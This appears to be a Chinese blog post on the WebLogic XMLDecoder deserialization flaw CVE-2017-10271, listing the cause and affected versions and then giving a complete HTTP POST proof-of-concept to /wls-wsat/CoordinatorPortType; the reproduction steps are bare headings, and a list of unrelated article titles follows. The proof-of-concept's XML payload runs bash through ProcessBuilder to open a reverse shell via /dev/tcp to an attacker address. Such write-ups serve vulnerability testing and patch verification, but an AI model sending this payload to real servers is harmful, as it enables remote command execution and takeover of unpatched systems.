weblogic漏洞(一)----CVE-2017-10271
2024-08-23 05:38:37
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)
0x01 漏洞原因:
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
0x02 影响版本:
10.3.6.0;12.1.3.0;12.2.1.1
0x3 POC:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: target-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/ip/port 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
0x04 漏洞复现:
启动靶机环境:
访问靶机环境:
发送数据包:
接收反弹shell:
最新文章
- jdk jre jvm 三者之间关系
- shr 右移测试
- SharePoint 2013 Designer系列之自定义列表表单
- iframe标签书写导致div不显示
- python之基本数据类型
- R中list对象属性以及具有list性质的对象
- I.MX6 linux Qt 同时支持Touch、mouse
- HDU 2544 最短路 (最短路,spfa)
- php透明合并png与jpg图片
- OD: SEHOP
- 优化DOM交互
- Visual Studio Code 中编写 C++ 的工作流
- SQL优化小技巧
- 安装Python-Jenkins
- React native中的组建通知通信:
- 腾讯TBS X5 WebView的简单使用
- static成员函数不能调用non-static成员函数
- apache配置修改
- Oracle的基本语法,存储函数及触发器
- Appium+python自动化7-输入中文